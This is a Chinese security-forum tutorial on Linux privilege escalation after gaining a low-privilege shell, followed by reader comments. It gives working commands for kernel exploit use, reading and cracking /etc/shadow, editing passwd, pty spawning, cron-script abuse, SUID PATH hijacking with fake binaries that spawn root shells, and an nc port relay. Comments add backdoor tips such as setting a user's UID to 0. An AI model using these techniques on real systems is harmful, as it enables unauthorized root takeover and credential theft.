从入门到放弃
*原创作者:piece of the past,本文属Freebuf原创奖励计划,未经许可禁止转载
日站就要日个彻底。往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。一下是我总结的一些提权方法。
几点前提
已经拿到低权shell
被入侵的机器上面有nc,python,perl等linux非常常见的工具
有权限上传文件和下载文件
内核漏洞提权
提到脏牛,运维流下两行眼泪,我们留下两行鼻血。内核漏洞是我们几乎最先想到的提权方法。通杀的内核漏洞是十分少见的,因而我们应该先对系统相关的信息进行收集。
查看发行版
cat /etc/issue
cat /etc/*-release
查看内核版本
uname -a
这里我找了台机器测试:
#uname -a
Linux xxxxx 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux#cat /etc/*-release
DISTRIB_ID=UbuntuDISTRIB_RELEASE=10.04
DISTRIB_CODENAME=lucid
DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"
这样,我们就得到了系统的内核版本(2.6.32-21 pae),cpu架构(i686),和发行版(ubuntu 10.04)
可以开始搜索了
大多内核漏洞通过内核版本能很快查到
用kali自带的searchsploit来搜索exploitdb中的漏洞利用代码
searchspoit linux 2.6 ubuntu priv esc
结果:
这么多,我们加入系统信息缩小范围
searchsploit linux priv esc 2.6 ubuntu 10
这样可选的exp就少多了,很无奈,我们需要漫长的点开exp看具体要求的筛选过程,大部分exp都会写清生效条件。因此我们能够虽然很气,但也很快地去掉一些不具备利用条件的exp。比如第三个exp针对一个特别的磁盘格式,排除。
经过艰难的寻找,发现15704,c很顺眼,于是把源代码上传,然后:
#gcc exp.c
#lsexp.c
a.out#./a.out
id
uid=0(root) gid=0(root)
我们先编译exp再执行。可以看到exp执行以后没输出,但是我们其实已经得到rootshell了(exp执行以后一定敲个命令,不然都不知道是成功了还是卡了)
exploitdb的搜索过程虽然繁琐,但是能基本保证不会遗漏漏洞。如果想先偷懒图个快的话,我们可以试试https://www.kernel-exploits.com/,这里的exp已经按照内核版本分类了,而且有很多已经完成了编译。
比如我们搜索2.6.32:
这个rds的binary刚巧能用。“我收集信息了,我上传exp了,我就root了。“
当然,以上只是非常理想的情况,我们经常会遇到没有gcc的坑爹服务器。这时我们就需要在本地编译。本地编译时不止要看exp源码注释的编译参数,也需要手动调整一下编译的参数,比如给gcc 加-m 32来编译32位。编译问题繁多,有困难找谷歌,不再赘述。
当内核版本没有好用的exp对应的时候,可以检查磁盘格式:
cat /etc/fstab
和已经安装的程序:
dpkg -l
rpm -qa
然后进行刚刚繁琐的搜索,没准就找到个bug
最后强调利用内核漏洞的几个注意点:
1.读源码,不然可能连编译都不会
2.读源码,不然费劲编译完才发现不适用
3.读源码,不然遇到一个删全盘的”exp“怎么办
明文root密码提权
passwd和shadow
虽然遇到的概率很小,但还是提一下
大多linux系统的密码都和/etc/passwd和/etc/shadow这两个配置文件息息相关。passwd里面储存了用户,shadow里面是密码的hash。出于安全考虑passwd是全用户可读,root可写的。shadow是仅root可读写的。
这里是一个典型的passwd文件
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
ibuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
passwd由冒号分割,第一列是用户名,第二列是密码,x代表密码hash被放在shadow里面了(这样非root就看不到了)。而shadow里面最重要的就是密码的hash
root:$6$URgq7sJf$4x8e9ntqTwAPIubi9YLxLQ2mZTTZKnGz0g/wWzOdPB5eGuz.S5iRtFdvfFd9VIVEWouiodB/hh9BYOLgAD8u5/:16902:0:99999:7:::
daemon:*:15730:0:99999:7:::
bin:*:15730:0:99999:7:::
sys:*:15730:0:99999:7:::
sync:*:15730:0:99999:7:::
games:*:15730:0:99999:7:::
man:*:15730:0:99999:7:::
lp:*:15730:0:99999:7:::
mail:*:15730:0:99999:7:::
news:*:15730:0:99999:7:::
uucp:*:15730:0:99999:7:::
proxy:*:15730:0:99999:7:::
www-data:*:15730:0:99999:7:::
backup:*:15730:0:99999:7:::
list:*:15730:0:99999:7:::
irc:*:15730:0:99999:7:::
gnats:*:15730:0:99999:7:::
nobody:*:15730:0:99999:7:::
libuuid:!:15730:0:99999:7:::
syslog:*:15730:0:99999:7:::
mysql:!:15730:0:99999:7:::
dovecot:*:15730:0:99999:7:::
sshd:*:15730:0:99999:7:::
postfix:*:15730:0:99999:7:::
shell命令来检查权限
cd /etc
ls -l passwd shadow
如果passwd可写,我们就可以把root的密码字段(x)替换成一个已知密码的hash(比如本机shadow里面的root密码hash),这样系统在验证密码时以passwd的为准,密码就已知了。如果shadow可读,我们可以读走root的hash,然后用hashcat或者john暴力破解之。
密码复用
很多管理员会重复使用密码,因此数据库或者web后台的密码也许就是root密码。
and then?
有了(疑似)root密码怎么办?你一定想ssh登陆。然而ssh很可能禁止root登陆,或是防火墙规则将你排除在外了。返回来想,我们不是有一个低权shell了吗?找个办法再上面“输入”密码就好了。显然,直接在低权shell里面用sudo是不奏效的。这是因为出于安全考虑,linux要求用户必须从终端设备(tty)中输入密码,而不是标准输入(stdin)。换句话说,sudo在你输入密码的时候本质上是读取了键盘,而不是bash里面输入的字符。因此为了能够输入密码,我们必须模拟一个终端设备。python就有这样的功能。在shell里面输入:
python -c 'import pty;pty.spawn("/bin/sh")'
就用python简历了一个虚拟终端,然后就可以使用sudo等等命令了。
python -c 'import pty;pty.spawn("/bin/sh")'
$ sudo su
sudo su
[sudo] password for www-data: 123456
Sorry, try again.
[sudo] password for www-data:
计划任务
系统内可能会有一些定时执行的任务,一般这些任务由crontab来管理,具有所属用户的权限。非root权限的用户是不可以列出root用户的计划任务的。但是/etc/内系统的计划任务可以被列出
ls -l /etc/cron*
默认这些程序以root权限执行,如果有幸遇到一个把其中脚本配置成任意用户可写的管理员,我们就可以修改脚本等回连rootshell了。
SUID
SUID是一种特殊的文件属性,它允许用户执行的文件以该文件的拥有者的身份运行。比如passwd命令,就是以root权限运行来修改shadow的。
这里我们做个实验(环境为ubuntu 16.04):
c源代码
#include<stdlib.h>
#include <unistd.h>
int main()
{
setuid(0);//run as root
system("id");
system("cat /etc/shadow");
}
以root进行编译和权限设置
gcc suid.c -o suid-exp
chmod 4755 ./suid-exp#这里设置了SUID位
ls -l
输出
-rwsr-xr-x 1 root root 8632 Mar 15 20:53 suid-exp
注意s属性,表示这个程序有SUID的属性。
接下来我们切换用户并执行
su test
./suid-exp
可以看到程序实际上已经提升到了root权限。
SUID程序经常存在提权漏洞,比如nmap就曾出现过提权漏洞。低权用户通过打开nmap交互模式以root执行任意系统命令。而除了借助程序功能提权,我们还可以尝试劫持环境变量提权。上文的c程序使用了system函数,system函数是继承环境变量的,因此我们通过替换环境变量可以达到执行任意命令的效果。
我们进入test低权用户的shell
cat >> /tmp/cat <<EOF
#!/usr/bin/python
print "this is not the true cat"
print "here is a root shell!"
import pty;pty.spawn("/bin/sh")
EOF
# 这里我们在/tmp建立了假的cat,它会用python执行一个shell
PATH=/tmp:$PATH#设置PATH,优先从/tmp查找程序
./suid-exp#执行suid程序,因为PATH被劫持,system("cat /etc/shadow");会执行我们的假cat
运行结果
还有一种情况:管理员配置错误,把不带setuid(0);代码的程序配置了SUID。当这些程序被劫持的时候,我们需要自己的程序中使用setuid(0);来提权到root。这里有一个小技巧,我们用perl脚本来setuid:
#!/usr/bin/perl
$< = $>;
$( = $) = 0;
system ("/bin/sh"):
用这个简单的脚本劫持,就把shell运行在root权限下了。
网络与隐藏的服务
有一些服务器的服务会被配置成对内网或者对本机开放。通过对他们的攻击我们有机会接触更多的敏感文件,或是运气足够好碰上一个远程root漏洞。
netstat -antup#查看各种网络服务
如果找到些神秘的服务,可以用netcat做个转发
mkfifo backpipe
nc -l 8082 0<backpipe | nc remote_host 445 1>backpipe
之后找漏洞,攻击,从头再来。
相关工具
提了那么配置错误的利用,却没说怎么找这些错误
分享两个脚本:
unix-privesc-check: http://pentestmonkey.net/tools/audit/unix-privesc-check
linuxprivchecker: https://www.securitysift.com/download/linuxprivchecker.py
这两个程序不止细致地检查了非常多的配置问题,更让人感动地列出了所有可写文件。基本上可以说他们的检查是足够全面的。
当然如果希望手动检查还是推荐 https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
总结
Linux提权花样非常多,涉及的技术五花八门。写这篇文章的时候总想把相关知识都解释清楚,但是面对系统繁琐的工作过程和众多的发行版深感自己理解之浅。我很赞同在很多论坛上看到的对于linux提权的提示:你需要知道linux系统的工作方式。各种奇技淫巧或是无比脑残的错误最终都回归到了系统的运行流程和权限管理机制上面。回归本质,系统地了解系统才是保证安全的最佳方式。
参考资料
http://www.xinotes.net/notes/note/1529/
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
联系方式
1005308775@qq.com
*原创作者:piece of the past,本文属Freebuf原创奖励计划,未经许可禁止转载
- 上一篇:数字取证技术 :Windows内存信息提取
- 下一篇:PHP网站渗透中的奇技淫巧:检查相等时的漏洞
-
evil7(5级)入梦落樱满熏香,梦醒犹记四月谎回复看完文章已入门了,已经做好放弃准备,哈哈哈。文章hin棒棒,就是错别字得注意……
关于EXP,除非完全苛刻的条件,还是在目标环境里编译吧,你永远不知道对方恼残机器里缺哪些lib哪些东西版本过低。本地编译了很容易翻车,而你还一头雾水被迫放弃,就拿你说的dirtycow来说,我就遇到过编译好的ELF在目标上无法使用的,目标机器上build才能发现需求的lib需要调整版本,EXP经常遇到找不到需要的lib库版本,所以最好到目标上去编译避免环境问题导致这种以为EXP没用的低级错误。那就真“入门to放弃”了……
比如脏牛刚出的时候,理论上通杀,但是我就在多环境测试中碰到过没成功的,测试到某release-mini版本Linux时就发现memcpy版本过低(感觉busybox可能也会有这个问题吧,lib不太全),查找目标环境库里所有版本后,发现都只有最低版本的,最后修改添加__asm__(".symver memcpy,memcpy@GLIBC_2.2.5"); 强制使用特定版本才解决。
SUID提权很经典,我记得有个查找SUID的脚本很实用,办公室电脑没有…大家自己搜一下gayhub里头吧…
还有,可以引申提一下利用SUID权限的ELF调用了本地命令的时候,配合PATH的组合拳,类似于DLL注入的感觉。
楼主写的这些都很基础,所以吧……估计又有人要喷“建国前我就看过了,你是刚通网么?”
出现分歧请ShowCode,创新套路可PR,喷喷代码问题大家都能虚心接受,冷嘲热讽的不如去菜市场砍价。
借地问路:完全没有gcc的环境,又无法现场安装gcc的(我记得gcc需要root才能装吧?貌似是……)还请大家指教一下,除了本地编译有没有更方便的办法解决?)9(亮了 -
microhard回复SQL:从删库到跑路)8(亮了
0daybank
已有 28 条评论
SQL:从删库到跑路
已入门,已放弃。
文章写的不错!
已入门,已放弃。
好文章,linux提权插眼。。。。。
一个多年困扰我的问题,centos6.5怎么提。26.32-431。
@ xxx semtex.c就可以提。
@ xxx DirtyCow,覆写passwd,几天前成功提过一台6.5
未入门,已放弃
看完文章已入门了,已经做好放弃准备,哈哈哈。文章hin棒棒,就是错别字得注意……
关于EXP,除非完全苛刻的条件,还是在目标环境里编译吧,你永远不知道对方恼残机器里缺哪些lib哪些东西版本过低。本地编译了很容易翻车,而你还一头雾水被迫放弃,就拿你说的dirtycow来说,我就遇到过编译好的ELF在目标上无法使用的,目标机器上build才能发现需求的lib需要调整版本,EXP经常遇到找不到需要的lib库版本,所以最好到目标上去编译避免环境问题导致这种以为EXP没用的低级错误。那就真“入门to放弃”了……
比如脏牛刚出的时候,理论上通杀,但是我就在多环境测试中碰到过没成功的,测试到某release-mini版本Linux时就发现memcpy版本过低(感觉busybox可能也会有这个问题吧,lib不太全),查找目标环境库里所有版本后,发现都只有最低版本的,最后修改添加__asm__(".symver memcpy,memcpy@GLIBC_2.2.5"); 强制使用特定版本才解决。
SUID提权很经典,我记得有个查找SUID的脚本很实用,办公室电脑没有…大家自己搜一下gayhub里头吧…
还有,可以引申提一下利用SUID权限的ELF调用了本地命令的时候,配合PATH的组合拳,类似于DLL注入的感觉。
楼主写的这些都很基础,所以吧……估计又有人要喷“建国前我就看过了,你是刚通网么?”
出现分歧请ShowCode,创新套路可PR,喷喷代码问题大家都能虚心接受,冷嘲热讽的不如去菜市场砍价。
借地问路:完全没有gcc的环境,又无法现场安装gcc的(我记得gcc需要root才能装吧?貌似是……)还请大家指教一下,除了本地编译有没有更方便的办法解决?
@ evil7 妈了个巴子… 我真去搜 gayhub 了… 我要去洗眼睛
@ a.tm.k 可以的,下次回复我改写成pornhub
首页配图真不错!
已经入门了,哦,已经放弃了。
PASSWD不用改HASH那么麻烦
www-data:x:33:33:www-data:/var/www:/bin/sh
改成
www-data:x:0:0:www-data:/var/www:/bin/sh
重新登录就是ROOT
另外编译的问题,本着悄悄的进村打枪的不要的精神,自己搭个系统内核都一样的虚拟机编译再丢上去是最靠谱的选择
精品!!!!给大佬点赞
转载的真快http://blog.csdn.net/earbao/article/details/65435050
searchspoit linux 2.6 ubuntu priv esc 中的 searchspoit少打了一个字母
脚本小子
赞一个,顺带问一下sudo强制tty输入的情况,除了python还有什么方法解决
@ 979784643 都能想办法读到shadow了,那就再想办法把/etc/sudoers里需求tty哪一行注释掉就好了。
话说,不如直接4755你的backdoor,然后再直接弹个root的shell出来。
不好意思,刚看到回复,感谢您介绍的经验,学习了^_^
exp找到了
编译也成功了
然而……根本反弹不出来。。。mdzz
这篇文章提及了几个思路,主要还在于对系统的了解程度和信息收集的能力。
一点用也没有,首先你是在root环境下进行测试的,一般运维都不会给你随便一个上传文件有执行的权限,所以第一步,你就挂了,没法执行,后面就没法进行,还有/etc/passwd普通用户没有写的权限,还有SUID的问题,还是权限问题,还是权限问题,还是权限问题。。。。。
@ evil7 真的 别的不服 就服你一言不合就开车..
有关Linux提权,rsync是否也要考虑在内呢?
在不能正常反弹的情况下,如何突破是否也是必须考虑的呢?
转载,行为恶劣,还好意思投 奖励计划,不知如何说你,好意思吗?